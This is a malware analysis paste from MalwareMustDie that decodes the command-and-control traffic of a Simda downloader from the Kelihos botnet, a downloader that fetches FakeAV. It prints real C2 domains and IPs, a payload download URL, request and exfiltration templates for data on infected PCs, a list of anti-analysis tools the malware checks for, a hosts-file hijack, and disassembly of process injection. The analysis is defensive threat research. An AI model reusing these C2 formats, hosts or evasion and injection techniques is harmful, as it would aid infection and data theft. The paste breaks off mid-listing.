MalwareMustDie

#MalwareMustDie - Decoding Kelihos Simda download FakeAV

Feb 10th, 2014
1,794
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // =========================================
  2. // #MalwareMustDie!
  3. // Kelihos botnet served payload analysis
  4. // Simda payload, downloader of FakeAV
  5. //
  6. @unixfreaxjp /malware/temp]$ date
  7. Mon Feb 10 21:14:53 JST 2014
  8. // =========================================
  9.  
  10. // first the sample info + VT link:
  11. -----------------------------------------------------------
  12. Sample : ./sample.mmd
  13. MD5    : 2cc3c5c253997c73781de81bf0cdd405
  14. SHA256 : bd82111305cbaf7c5fd1d33f3e7f55f3f7b8a2ed402abd4ede0adeb3037960c9
  15. VT URL : https://www.virustotal.com/en/file/bd82111305cbaf7c5fd1d33f3e7f55f3f7b8a2ed402abd4ede0adeb3037960c9/analysis/1392034168/
  16. Detection ratio: 31 / 50
  17. -----------------------------------------------------------
  18.  
  19. // main course...
  20.  
  21. //================================
  22. // Decoding of of the CNC Traffic
  23. // Compare the traffic to reverse
  24. // binary result to get the crack
  25. // logic.
  26. //
  27. // Noted: I did this "my way"
  28. // Adding here and there analysis to -
  29. // find something new..
  30. //================================
  31.  
  32.  
  33. // ---------------------------------------
  34. // TRAFFIC #1
  35. // requesting for the setup beacon..
  36. // ---------------------------------------
  37.  
  38. GET /?7y31731=%96%C9%A5%A6%A6%D8c%AA%A6%97%9B%D8ll%9B%9
  39. 8%AFf%98m%CE%DE%5E%98%A3%A1%9D%DEi%93l%96%97%98%DC%E6%A
  40. C%E9%EA%86%C7%99%AA%9E%D7rffh%AFf%5B%A1%DB%E0k%C7%D4%9A
  41. z%C1Y%9E%A0%97n%A6%A9%B5%A5%B5%ADd%AD%ACwh%B4l%7Bmz%B1l
  42. wf%B3%AAa%A4%A3%B3n%BCwjjvW%E4%CA%E3%AC%A2%A4%5E%A7%A3h
  43. f%A3eeef%A9eee%9D%A9%5E%93%95%E3t%A9cagcb%B8%9B%96%E1%E
  44. C%B1a%A9%97 HTTP/1.1
  45. Host: report.ws55s5555y555my.com
  46. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0;
  47.             Trident/4.0;
  48.             .NET CLR 2.0.50727;
  49.             .NET CLR 1.1.4322;
  50.             .NET CLR 3.0.04506.590;
  51.             .NET CLR 3.0.04506.648;
  52.             .NET CLR 3.5.21022;
  53.             .NET CLR 3.0.4506.2152;
  54.             .NET CLR 3.5.30729)
  55.  
  56. // Reversed..
  57. //...shows the domain (the same domains as captured)
  58.  
  59. 4258f0: report.ws55s5555y555my.com  <=== good, got the howtos here..
  60.  
  61. //next...with cracked urls:
  62. 4114f8: /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3 <== #w000t!!
  63.  
  64. //templates:
  65. $%s&controller=sign&data=%s&oldmid=%s&mid=%s$
  66.  
  67. // ---------------------------------------
  68. // TRAFFIC #2
  69. // POSTING the Infection PC ID..
  70. // ---------------------------------------
  71.  
  72. POST / HTTP/1.1
  73. Host: report.ws55s5555y555my.com
  74. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0;
  75.             Trident/4.0;
  76.             .NET CLR 2.0.50727;
  77.             .NET CLR 1.1.4322;
  78.             .NET CLR 3.0.04506.590;
  79.             .NET CLR 3.0.04506.648;
  80.             .NET CLR 3.5.21022;
  81.             .NET CLR 3.0.4506.2152;
  82.             .NET CLR 3.5.30729)
  83. Content-Length: 5476
  84. Content-Type: application/x-www-form-urlencoded
  85.  
  86. 31yWS=%96%97%D1%D3%A3%AA_%AA%A7hi%D6feg%97%A9eln%CE%B1b
  87. %94%D3%CE%94%96%AC%BB%88%A2%95%96%E1%D3%EBk%EA%E1fe%A3n
  88. gnn%AFmi%94%E4%E2_%95%A8%A5ic%B2%8C%84%A2%9E%A1%9F%AB%A
  89. 7e%AC%A3%94%A4%E0kkhf%B2nik%A1%A9%5E%95%A0%A5ib%B2%8B%8
  90. 8%A9%9D%A6%9F%A3%AC%8F%AE%A3%98b%D8%96%9Aib%ADeil%9A%DA
  91. d%9C%A6%9A%95%97%DC%8D%B6%A8%96%A2%A8%D6%A7%91%D6%D2if%
  92. A7iebi%AAibi%9E%ADb%93%A7%A2%60e%AA%8B%87%A2%C4%CF%A2%A
  93. 4%AD%5E%AD%ABfj%A5%5B%AC%ABr%F0%AB%8D%85%93%EE%97%C7%AC
  94. %9Edd%AF%88y%DE%D3%D7%AC%D6%D9%5B%BA%BB%5B%A2%DC%99riy%
  95. BEkxn%A3%AFg%A5%A2%AEjw%B1%9C%8B%A9%A7%A1%B5%A3%A7o%AB%
  96. B9lx%B7nhx%5B%EB%9A%A8r%9D%A9%5E%93%9F%A0da%A9%87%83%A3
  97. %95%A0%9F%A2%A4%5E%A7%A3%5B%AB%B0eeee%A9f%7Bk%93%EB%A8%
  98. A0%A2%9FY%A3%DE%C7%C2%E4%D9%AD%C2%E1%DA%A2%C0%E1%A8%A9%
  99. D4%A1%A1%5B%A8%E8%9B%A9r%AE%DD%9D%C5%D4%8Dy%9D%DA%CA%BB
  100. %92%B5%DC%D0%EB%D9%A0%97%A4fU%B4%98%A9%9E%AB%DE%8DB%3F%
  101. AE%CDw%83%9C%8Dw%9A%DE%C5%C6%E6%D5%E2%DE%D9%E6%8F%E4%E0
  102. U%AF%E8%A7Uy%9A%E2%A3%A8%A9%CE%E5%9A%C4%E3%D6%A2%9F%99%
  103. BB%B8%E4%85%C3%DE%D8%E8%A5%D8%E5%9AB%7Dv%AA%A9%A4%C2%A9
  104. U%AB%A0%A7a%91%A7%9Bd%3E%83%9A%96%DE%CA%D1%DD%D7%E6%3B%
  105. 81%BC%A3%A9%D8%A1%5D%87%5E%99%7C%A7%96%DD%E1%97%C6%E2%8
  106. D%80%96%DD%C0%B4%92%A6%D3%D2%D7%E0%93%E9%D4%A9%A4%E5Uy%
  107. A7%9E%EF%9A%A7Bw%C2%9C%D7%D4%D9%E1Q%C6%B8%C1%D3%CC%D5%D
  108. C%D7%E2%A2%A4%B8%A3%9C%DC%A3%9Ab~%E7%A9%9A%A7%D3%DA%91%
  109. C8%7Cw%8A%9A%E7%BB%C2%E9%D8%90%B8%E0%E8%93%E9%E1%9A%A9%
  110. 93z%AD%A5%A1%E8%A7%9A%A7%8D%B1%3Bm%C2%D6%96%99%DE%C9%BB
  111. %D7%CE%E4%E2%E7%E4%92%D8%E7%9AU%D9%31%A7U%8C%E2%A3%99%A
  112. 4%E4%ECN%AC%DD%E1%98%A3%E7%BC%C7%92%AA%E8%DF%DE%E3%A0%D
  113. C%E5Um%93%5D%80wg%ADnlk%A1%A9Wpy%C0%9C%94%E1%BC%C5%DA%C
  114. A%D9%E3%E5%E9%9E%DB%D4%A9%9A%93%9B%31%A7U%D0%9E%A3%99%D
  115. C%F0%A1%83%B8%DB%A7%96%EB%C5%B8%E6%85%B5%E7%E2%E0%9D%E9
  116. %D8%A7U%ABU%5D%80w%ABjfe%A2%AC_%8C%7Cw%7B%A0%ED%BD%BC%E
  117. A%85%D6%6B%E4%94%85%E0%E1%99%A4%EA%A8U%8D%85%99%5D%80w%
  118. A6%AFg%93%A7%A1%5C%3E%83%A0%C1%E6%CA%DC%1D%92%B5%91%EB%
  119. DC%AB%9A%A0%82%96%A3%96%E0%9A%A2%9A%DB%ED%5B%B7%D4%D0%9
  120. B%9F%E8%C3%C2%D9%CE%D5%7C%7C%C1%97%DA%E5%A4%A8%E2%9B%A9
  121. Uc%C7z%89U%B3%EB%8F%D0%D4%E4%A2%A3%E4w%86%A0%9A%90%BB%D
  122. 3%E2%95%EC%D4%9C%9A%93%85%96%98%A0%99%88%85f%8D%A6N%A7%
  123. B4%C2%40%3B%C6%C0%B6%E4%D4%E3%DE%D8%E8N%A5%C1z%89%93%7B
  124. %A7%96%A2%DE%AC%A4%A7%D8%99a%91%A4%8D%86%81%AAd%5D%BF%C
  125. E%D3%E1%E1%E7%9D%DD%E7Ux%E2%A2%A5%A7%9A%EC%A8%9E%A4%DB%
  126. 99q%CF%D8%D2%A1%A5%99%A7%B4%D5%D0%90%A0%A0%A4N%DD%E2%A7
  127. U%CA%9E%A3%99%A4%F0%A8U%8D%BD%868%BA%D8%DB%97%A0%F0%CAs
  128. %BF%CA%D4%D8%D3%94t%E6%E5%A2%96%E7UffU%EB%AA%A3%A9%D6%E
  129. 6%93py%C4%9C%9F%DD%C6%CA%E5%85%BD%D4%D6%DD%8F%97%C3%A1%
  130. 96%EC%9A%A7Uf%AAB%3F%82%D6%DC%A0%D2%E2%DC%99%A5%99%AC%C
  131. 6%D7%D7%9D%BC%E1%D8%93%97%B7%A7%9E%E9%9A%A7U%7B%EB%96%A
  132. 2%9A%E4%E8%A0%CE%8F%B3%98%92%ED%CC%C5%D7%85%C0%D0%D5%DF
  133. N%A8%A1eB%7D~%A3%A9%9A%E5%5D%87%5E%8D%C9%80%B2%8F%BB%98
  134. %A5%F0%C6%C5%DD%85%B3%DE%E0%E2%93%DA%E7%9E%A4%E1%A8Ufg%
  135. A7fcf%9F%A7%5Epy%BA%9C%94%EB%C6%C6%E1%CB%E4%8F%C1%DA%94
  136. %E0%D6%9AU%C3%A7%A4%9B%9A%EC%A8%9E%A4%DB%DA%9A%83%B4%D1
  137. %9C%A5%E2%C6%C1%92%97%A0%9F%A5%818%CE%DC%A3%97%E2%A3%99
  138. U%89%C9%82Uy%D2%EF%97%C6%D4%8Dw%A3%E2%CD%B8%E4rz%C6%DB%
  139. E2%92%E6%EA%A8U%B7%9A%9B%9A%A3%DD%9A%A7Bw%C6%97%C6%E1%D
  140. C%A6%A0%DF%CBs%A0%B3%B5%C3%92%BA%A0%D8%E0%9A%AC%E2%A7%A
  141. 0Uh%A7eU%88%D2%EB%A4%CC%D2%D2S%81%DA%BA%BE%92%97%7Dy%B3
  142. %D8%9D%D9%D8U%87%D8%96%99%9A%A7%99nci%9B%A9%3Bm%BC%D6%9
  143. 6%A3%E8%CA%C2%D8%D9%90%9D%C0%B9%82%97%B9%A7%96%E0%9A%AC
  144. %A4%A7%E4Ugc%9D%99%81%C8%E1%E3%9C%94%DEw%A3%D3%C8%DB%8F
  145. %A4%818%C4%DC%98%A7%E2%A8%A4%9B%A9%99c%83z%C1%99t%D5%D0
  146. %DA%98%A8%E8%C9%BE%92%98%9E%9F%92%C7%93%E9%E9%9E%98%D8U
  147. %85%96%98%E4UgU%B9%DA%9C%CA%E4%CE%9A%96%99%A7%B4%D5%D0%
  148. 90%9C%92%B8s%CC%80%3F%82%DC%98%A7%A4%A8%E8%9B%A9U%9B%C7
  149. s%B7%8F%B3%A5%92%E6%BC%CA%E1%D7%DB%8F%A4%A2%5E%97%C6%9A
  150. %A7%E9%9E%98%9AU%C9%96%98%A0%8D%ABN%AF%D0%DB%9A%A6%DA%B
  151. E%B8%92%B5%D1%D2%DD%94%5B%97%B7z%8A%80%3F%89%AC%9A%DA%A
  152. 0%AA%9E%8D%C9%9D%DA%D4%DF%A7%A0%F2w%B9%E1%D7%90%C6%DB%E
  153. 2%92%E6%EA%A8U%CB%85B%3F%88%DE%98%AA%A7%D6%ED%A7%83%C4%
  154. DD%97%92%ED%BCs%D8%D4%E2%8F%BF%DD%91%E9%E2%A8%A4%D9%A9U
  155. c%83%BE%89U%7B%DF%DA%9B%C8%E6%DC%A5%9C%99%8A%81%A7%85%C
  156. 3%BF%A3%94V%C2%B5gi%A4kilh%A2B%3F%7D%DC%ED%94%CC%E7%8D%
  157. 99%A0%EBw%A0%DB%C8%E2%DE%E5%E3%94%EB%93c%83%B8%89U%7B%A
  158. 7%DA%A2%9A%AC%DC%EB%99%83%A2%9BhQ%CC%A7%84%92%8D%BB%B1%
  159. AB%A9a%AC%ACj%5E%80%3F%7D%A4%A9%DF%9E%ADU%D3%E8%A0%83%B
  160. C%D6%96%A3%E8%CA%C2%D8%D9%90%9D%C0%B9%82%97%B9%A7%96%E0
  161. %9A%AC%A4%A7%E4Uhc%A2%99%81%B3%A0%8D%5B%7C%BB%90%88%AA%
  162. 99%A8%A3%9B%818%CA%E2%AA%A3%D7%82v%8DB%83%82%9E%98%DF%E
  163. 8%A1%D2%D5%E1S%87%E2%CA%C8%D3%D1%90%B2%9D%9FN%A9%A3fe%9
  164. 3U%ADmk%99%87%9A%99%D6%EC%A2%D5%D8%CF%A8%A5%DA%B9%BF%D7
  165. %85%9D%8F%A3%A4%5C%A7%A1ie%A5fnB%3F%9F%A5%A7%A4%D0%B6%8
  166. 9%B6%E8%E0%A7%96%E6w%A3%E4%D4%D3%D4%E5%E7%8B%84%7D%88%A
  167. E%E6%A9%9A%A2B%83%A8%A2%A8%E0%A7%93%DB%D4z%3D%94%EC%C9%
  168. C6%E5%93%D5%E7%D7%818%EE%DC%A3%A1%E2%9C%A4%A3c%DE%AD%9A
  169. Bw%EC%93%D5%E5%D6%96%96%EC%85%B8%EA%CA%7Dy%DE%E7%8F%EA%
  170. E6c%9A%EB%9AB%3Fy%BF%88%9A%A7%E3%A7%93%DB%D4z%3D%A4%EF%
  171. BA%BB%E1%D8%E4%9D%D7%EC%93%84%7D%A8%AB%D6%9D%A4%A8%A9%A
  172. 7%9A%AD%9Az%83%A1%D9%D2%D5%A2%A4%ED%85%B8%EA%CA%7Dy%E5%
  173. EA%91%DF%E2%A8%A9%A1%9A%AD%9AB%83%9A%AD%A5%D9%E8%A0%C8%
  174. E1%9B%98%A9%DEd%5D%E5%D5%DF%DE%DE%E7%A4%A5%D8%AD%9A%80%
  175. 3F%A8%A2%96%F1i%A5%A3%DD%A7%93%DB%D4z%3D%84%C6%B8%CB%A6
  176. %93%D5%E7%D7%818%DA%E7%9B%A2%E2%A3c%9A%AD%DEB%3F%A7%E2%
  177. E7%92%CF%DB%A0e_%DE%CF%B8%7Fo%E3%E5%D5%DC%9D%EA%E7c%9A%
  178. EB%9AB%3F%96%ED%98%9D%A0%E0%EB%A4%91%D4%E5%98%3E%83%A3%
  179. A0%C5%93%D5%E7%D7%818%CC%C1%88c%D8%AD%9AB%3F%DA%A1%9Cc%
  180. D2%F1%93py%B3%A5%AB%CC%CB%B4%E6%CA%A2%DA%A0%D9%A6%DC%80
  181. %3F%AC%E0%9E%A5%A7%AB%EC%9Ac%9A%E5%DE%3Bm%C2%E6%A6%A5%D
  182. E%C4%60%7C%B8%E9%E2%E6%D9%9B%84%7D%88%AE%E6%A9%9A%A2B%8
  183. 3%88%AE%A8%E1%DE%9Bpy%C0%AC%A4%ED%BC%C0%7Fo%E7%DC%DB%E4
  184. %A0%ED%E6%9Ac%D8%AD%9AB%3F%CC%AE%A8%A9%D2%E6%3Bm%D0%D4%
  185. A1%96%EC%CB%BC%A0%CA%E8%D4%7F~R
  186.  
  187. // Template of this POST command is:
  188.  
  189. 410fe8: POST %s HTTP/1.1  Host: %s  User-Agent: %s  
  190.         Content-Length: %d  
  191.         Content-Type: application/x-www-form-urlencoded    
  192.         %s
  193.  
  194. // values decrypted is:
  195.  
  196. 4259f0: wv=wvXP&
  197.         uid=11361&
  198.         lng=de-CH&
  199.         mid=4DE6C9669B3A7F8E87B1F13A4F7CD93C&
  200.         res=00000320000100000000&
  201.         v=000001F6
  202.         &rz=32
  203.  
  204. //template grabbed in reversing:
  205. 411198: wv=%s&uid=%d&lng=%s&mid=%s&res=%s&v=%08X&rz=%d
  206.  
  207. // [...] and so on..(I think↑ is enough for evidence..
  208. // Obviously infected PC information was sent..
  209.  
  210.  
  211. // ---------------------------------------
  212. // REQUEST #3
  213. // Here goes the FakeAV mess....
  214. // ---------------------------------------
  215.  
  216. GET /?de=kayoyZWnmmKfmJikqpfJ2m6nl2qmpGeZ0qTZ0cnCqZuRkc
  217. jS3evY0%2BCk1KZ26NiV0ZXR1uTFnsfZY9KazZ%2FiqZ3NdZWjpdncl
  218. 8espK3VmJSpmWKempiiqMvKqnDSZWqqqGTGptHW1cWWqshU2M7HrKuq
  219. qap7qGpvrrFhpKazrbWcmLaWdJyYpKO9nae4caJ3XQ%3D%3D HTTP/1.1
  220.  
  221. Host: update.kecowfdt8o49uo.com  // unexists!!
  222. User-Agent: Mozilla/5.0 (Windows NT 6.1;
  223.             WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
  224. Connection: Keep-Alive
  225.  
  226. // Reversed...
  227.  
  228. Coded template:
  229. 410ac8: update%s.%s.com <=== we know how the decode form
  230.  
  231. // Thanks to hosts overwriting the access received the motherhost!!
  232. // Response:
  233.  
  234.  
  235. HTTP/1.1 200 OK
  236. Server: nginx
  237. Date: Mon, 10 Feb 2014 10:07:09 GMT
  238. Content-Type: text/html
  239. Transfer-Encoding: chunked
  240. Connection: close
  241. X-Powered-By: PHP/5.3.16
  242.  
  243. 80
  244.  
  245. 2513465194980a70c6d814d5db21b2432f5b82a099664ea242f5bd0
  246. 20459550cb45a50e1c47aac060a347d652cf549e2869ddb7e020995
  247. 2b573f8a370fe58f9d
  248. 0
  249.  
  250.  
  251. // so ..hostname are encoded..
  252. // cracked:
  253.  
  254. http://update1.highguarded.com  // <=== #w00tw00t!!
  255.  
  256. // The GET request also different encoding, cracked;
  257. /?abbr=RTK&action=download&setupType=drop64&setupFileName=dropper64.exe  #w00tw00t!!
  258.  
  259. //PoC:
  260. http://urlquery.net/queued.php?id=65248966
  261. https://www.virustotal.com/en/url/8363fdd4899e1f544f4f2b626ce985be85f4cfab0e62ce3f33ac05df4b496280/analysis/1392037874/
  262.  
  263. // traces of binary saved:
  264. 4114b5: %temp%\11361.sys
  265. 4114a8: %temp%/update_c1eec.exe
  266. 4123c8: %appdata%\ScanDisc.exe
  267. // maybe changes(random), has seeds..go figure?
  268.  
  269. // PS: These "WannaFoolMe" request are fakes.. Noted: MMD is not that fools:
  270.  
  271. 411394: Host: update1.randomstring.com  User-Agent: IE7  
  272. 411394: Host: update1.randomstring.com  User-Agent: IE7  
  273. 411554: Host: update1.randomstring.com  User-Agent: IE7  
  274. 4114c4: Host: update1.randomstring.com  User-Agent: IE7  
  275. [...]
  276.  
  277. //---------------------------------------
  278. // ETC TRAFFIC...
  279. // AND THE NEXTS (REQUEST OF SAME PATTERN)
  280. // ---------------------------------------
  281.  
  282. GET /?I17q20=%96%C6%A6%A6%A6%D9%60%AF%A3el%D8%9B%99hj%A
  283. C%96im%D2%DCe%96%D1%A2%7C%97k%A6bh%D6%8B%E7%E5%AF%EB%A4
  284. %CF%C3%5B%AA%DC%99rff%ACkf%5B%D9%E7%95%A0%D3%D2vt%7F%97
  285. %9F%99%D6%A2%A4%B3%B7%AAq%B0%A9kn%B5hvl%7B%B1zml%AF%AAt
  286. %94%A2%AE%7Dwn%B4vi%A5%A8%96%E1%D7%E7k%A7%A3ee%A3geee%A
  287. 9efe%9D%A9%5E%93%9F%9DyW%AD%AEb%60%A2%95%A0%A0%B8%AAT%E
  288. 9%EDrh%A5Y HTTP/1.1
  289.  
  290. Host: report.ws55s5555y555my.com
  291.  
  292. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0;
  293.             Trident/4.0;
  294.             .NET CLR 2.0.50727;
  295.             .NET CLR 1.1.4322;
  296.             .NET CLR 3.0.04506.590;
  297.             .NET CLR 3.0.04506.648;
  298.             .NET CLR 3.5.21022;
  299.             .NET CLR 3.0.4506.2152;
  300.             .NET CLR 3.5.30729)
  301.  
  302. (( no response..is a beacon, leave it!))
  303.  
  304.  
  305. // Autoruns..
  306. 413fb0: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
  307.  
  308. // Spam trace???.. hmm..not good!!
  309. //..partial decoded strings..
  310. 41134c: v=spf1 a mx ip4:%d.%d.%d.%d/%d ?all
  311.  
  312.  
  313. // payload was checking these applications:
  314.  
  315.  EtherD.exe
  316.  Regshot.exe
  317.  ollydbg.exe
  318.  ZxSniffer.exe
  319.  Syser.exe
  320.  CamRecorder.exe
  321.  wspass.exe
  322.  SymRecv.exe
  323.  SbieSvc.exe
  324.  ERDNT.exe
  325.  SandboxieDcomLaunch.exe
  326.  irise.exe
  327.  IrisSvc.exe
  328.  vba32arkit.exe
  329.  DrvLoader.exe
  330.  SUPERAntiSpyware.exe
  331.  %appdata%\ScanDisc.exe
  332.  VBoxTray.exe
  333.  tcpdump.exe
  334.  SandboxieRpcSs.exe
  335.  CamtasiaStudio.exe
  336.  ERUNT.exe
  337.  Sniffer.exe
  338.  wireshark.exe
  339.  dumpcap.exe
  340.  VBoxService.exe
  341.  cv.exe
  342.  Aircrack-ngGui.exe
  343.  WinDump.exe
  344.  observer.exe
  345.  windbg.exe
  346.  PEBrowseDbg.exe
  347.  
  348.  
  349. // here is the responsible spot for getting the payload URL..
  350. // rewriting the  "hosts" trace
  351.  
  352. 413010: # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
  353.         # source server
  354. 412c74: # Copyright (c) 1993-2006 Microsoft Corp.
  355. 413060: # This file contains the mappings of IP addresses to host names. Each
  356. 4131f4: # lines or following the machine name denoted by a # symbol.
  357. 412de0: # The IP address and the host name should be separated by at least one
  358. 412e2c: # space.
  359. 412ef8: #      102.54.94.97     rhino.acme.com
  360. 412f40: #       38.25.63.10     x.acme.com              # x client host
  361. // added nasty stuff to download from update.kecowfdt8o49uo.com
  362.  
  363.  
  364. // Post Installation contacted IP:
  365. IP              PORTS
  366. ------------------------
  367. 5.61.32.192 22
  368. 79.142.66.240   22 80 443
  369. 5.149.248.85    22 80
  370. 92.123.68.97    80 443
  371.  
  372. // IP GEO info:
  373. 5.61.32.192||16265 | 5.61.32.0/20 | LEASEWEB | DE | 3NT.COM | 3NT SOLUTIONS LLP
  374. 79.142.66.240|hosted-by.altushost.com.|60778 | 79.142.64.0/22 | FELICITY | NL | ALTUSHOST.COM | ALTUSHOST B.V.
  375. 5.149.248.85||59711 | 5.149.248.0/23 | FORTUNIX | NL | HOSTZEALOT.COM | FORTUNIX NETWORKS L.P.
  376. 92.123.68.97|a92-123-68-97.deploy.akamaitechnologies.com.|1299 | 92.123.68.0/24 | TELIANET | GB | AKAMAI.COM | AKAMAI TECHNOLOGIES
  377.  
  378.  
  379. // ADDITIONALS..PERSONAL MEMOs....
  380.  
  381. // OpenSearch XML in the binary builder for traces??? #LOL
  382.  
  383. 40c674: </Arguments      </Exec    </Actions  </Task  <!--00--  
  384. 40c3ec: <Actions
  385. 4138bc: <Param name="q" value="{searchTerms}"/
  386. 4134bc: <DescriptionSearch for the best price.</Description
  387. 413540: <Image width="16" height="16"data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAaRJREFUeNpiVIg5JRURw0A0YAHio943kYV%2B%2Ff33%2BdvvX7%2F%2FMjEx8nKycrGzwKXOiPKzICvdeezLhCV3jp15%2Bfv%2FX0YGhv8
  388. 41384f: e2LCC4AAAwAyjg7ENzDDWAAAAABJRU5ErkJggg%3D%3D</Image
  389.  
  390. // Code injection w/WriteProcessMemory(KERNEL32.DLL)
  391.  
  392. Code function: 0_2_0x4092CB VirtualAllocEx,GetLastError
  393. ,GetLastError,CloseHandle,WriteProcessMemory,GetLastErr
  394. or,CloseHandle,GetModuleHandleW,GetProcAddress,CreateRe
  395. moteThread,GetLastError,CloseHandle,CloseHandle,WaitFor
  396. SingleObject,CloseHandle
  397.  
  398. 0x40930F    call dword ptr [0x40C0C8h]      "VirtualAllocEx@KERNEL32.DLL" (Import, 5 Params)
  399. 0x409315    mov esi, dword ptr [0x40C180h]  "GetLastError@KERNEL32.DLL" (Import, Unknown Params)
  400. 0x40931B    mov dword ptr [ebp-08h], eax   
  401. 0x40931E    call esi                    "GetLastError@KERNEL32.DLL" (Import, Unknown Params)
  402. 0x409320    mov dword ptr [ebp-0Ch], eax   
  403. 0x409323    cmp dword ptr [ebp-08h], ebx   
  404. 0x409326    jne 0x40933Dh   target: 0x40933D
  405. 0x409328    push dword ptr [ebp-04h]   
  406. 0x40932B    call dword ptr [0x40C130h]      "CloseHandle@KERNEL32.DLL" (Import, 1 Params)
  407. 0x409331    mov dword ptr [004257ECh], 00000007h   
  408. 0x40933B    jmp 0x4093B2h   target: 0x4093B2
  409. 0x40933D    push ebx    xref: 0x409326
  410. 0x40933E    push edi   
  411. 0x40933F    push dword ptr [ebp+08h]   
  412. 0x409342    mov edi, dword ptr [ebp-04h]   
  413. 0x409345    push dword ptr [ebp-08h]   
  414. 0x409348    push edi   
  415. 0x409349    call dword ptr [0x40C0BCh]      "WriteProcessMemory@KERNEL32.DLL" (Import, 5 Params) ?? <=== here..
  416. 0x40934F    test eax, eax  
  417.  
  418.  
  419. // Code Exectution "ShellExecuteW"
  420.  
  421. Code function: 0_2_0x4033C0 DialogBoxParamW,memset,mems
  422. et,memset,wcsstr,wsprintfW,ExpandEnvironmentStringsW,Co
  423. pyFileW,wsprintfW,ShellExecuteW,GetLastError,
  424.  
  425. 0x4033C0    push ebp    xref: 0x402626
  426. 0x4033C1    mov ebp, esp   
  427. 0x4033C3    sub esp, 00000618h 
  428. 0x4033C9    push esi        "DialogBoxParamW@USER32.DLL" (Import, 5 Params)
  429. 0x4033CA    push edi   
  430. 0x4033CB    xor eax, eax   
  431. 0x4033CD    mov esi, 00000206h 
  432. 0x4033D2    push esi   
  433. 0x4033D3    xor edi, edi   
  434. 0x4033D5    mov word ptr [ebp-00000208h], ax   
  435. 0x4033DC    lea eax, dword ptr [ebp-00000206h] 
  436. 0x4033E2    push edi   
  437. 0x4033E3    push eax   
  438. 0x4033E4    call 0x40B208h  "memset@MSVCRT.DLL" (Import, 0 Params) target: 0x40B208
  439. 0x4033E9    xor eax, eax   
  440. 0x4033EB    push esi   
  441. 0x4033EC    mov word ptr [ebp-00000410h], ax   
  442. 0x4033F3    lea eax, dword ptr [ebp-0000x40Eh] 
  443. 0x4033F9    push edi   
  444. 0x4033FA    push eax   
  445. 0x4033FB    call 0x40B208h  "memset@MSVCRT.DLL" (Import, 0 Params) target: 0x40B208
  446. 0x403400    xor eax, eax   
  447. 0x403402    push esi   
  448. 0x403403    mov word ptr [ebp-00000618h], ax   
  449. 0x40340A    lea eax, dword ptr [ebp-00000616h] 
  450. 0x403410    push edi   
  451. 0x403411    push eax   
  452. 0x403412    call 0x40B208h  memset@MSVCRT.DLL (Import, 0 Params) target: 0x40B208
  453. 0x403417    push 00413EA0h  UTF-16 "Temp\Low"
  454. 0x40341C    mov esi, 00414910h  UTF-16 "C:\agnesti.exe"
  455. 0x403421    push esi    UTF-16 "C:\agnesti.exe"
  456. 0x403422    call dword ptr [0x40C370h]  "wcsstr@MSVCRT.DLL" (Import, Unknown Params)
  457. 0x403428    add esp, 2Ch   
  458. 0x40342B    test eax, eax  
  459. 0x40342D    je 0x40348Bh    target: 0x40348B
  460. 0x40342F    push 00000009h 
  461. 0x403431    lea eax, dword ptr [ebp-00000410h] 
  462. 0x403437    push eax   
  463. 0x403438    push 00000005h 
  464. 0x40343A    pop eax
  465. 0x40343B    call 0x4068FEh  target: 0x4068FE
  466. 0x403440    lea eax, dword ptr [ebp-00000410h] 
  467. 0x403446    push eax   
  468. 0x403447    push 00413EB4h  UTF-16 "%TEMP%"
  469. 0x40344C    lea eax, dword ptr [ebp-00000618h] 
  470. 0x403452    push 00413EC4h  UTF-16 "%s\%s.exe"
  471. 0x403457    push eax   
  472. 0x403458    call dword ptr [0x40C248h]  "wsprintfW@USER32.DLL" (Import, 0 Params)
  473. 0x40345E    add esp, 10h   
  474. 0x403461    push 00000104h 
  475. 0x403466    lea eax, dword ptr [ebp-00000208h] 
  476. 0x40346C    push eax   
  477. 0x40346D    lea eax, dword ptr [ebp-00000618h] 
  478. 0x403473    push eax   
  479. 0x403474    call dword ptr [0x40C1A4h]  "ExpandEnvironmentStringsW@KERNEL32.DLL" (Import, 3 Params)
  480. 0x40347A    push edi   
  481. 0x40347B    lea eax, dword ptr [ebp-00000208h] 
  482. 0x403481    push eax   
  483. 0x403482    push esi    UTF-16 "C:\agnesti.exe"
  484. 0x403483    call dword ptr [0x40C16Ch]  "CopyFileW@KERNEL32.DLL" (Import, 3 Params) //<== See??
  485. 0x403489    jmp 0x4034A1h   target: 0x4034A1
  486. 0x40348B    push esi    UTF-16 "C:\agnesti.exe" xref: 0x40342D
  487. 0x40348C    lea eax, dword ptr [ebp-00000208h] 
  488. 0x403492    push 00413ED8h 
  489. 0x403497    push eax   
  490. 0x403498    call dword ptr [0x40C248h]  "wsprintfW@USER32.DLL" (Import, 0 Params)
  491. 0x40349E    add esp, 0Ch   
  492. 0x4034A1    push 00000003h  xref: 0x403489
  493. 0x4034A3    push edi   
  494. 0x4034A4    push 00413B60h  UTF-16 "/param"
  495. 0x4034A9    lea eax, dword ptr [ebp-00000208h] 
  496. 0x4034AF    push eax   
  497. 0x4034B0    push 00413EE0h  UTF-16 "runas"
  498. 0x4034B5    push edi   
  499. 0x4034B6    call dword ptr [0x40C21Ch]  "ShellExecuteW@SHELL32.DLL" (Import, 6 Params) // <=== See??
  500. 0x4034BC    cmp eax, 20h   
  501. 0x4034BF    jnle 0x4034C9h  target: 0x4034C9
  502. 0x4034C1    call dword ptr [0x40C180h]  "GetLastError@KERNEL32.DLL" (Import, Unknown Params)
  503. 0x4034C7    mov edi, eax   
  504. 0x4034C9    mov eax, edi    xref: 0x4034BF
  505. 0x4034CB    pop edi
  506. 0x4034CC    pop esi
  507. 0x4034CD    leave  
  508. 0x4034CE    ret     function end
  509.  
  510.  
  511. // Remote Process(Read: thread)  Writing:
  512.  
  513. Code function: 0_2_0x4092CB VirtualAllocEx,GetLastError
  514. ,GetLastError,CloseHandle,WriteProcessMemory,GetLastErr
  515. or,CloseHandle,GetModuleHandleW,GetProcAddress,CreateRe
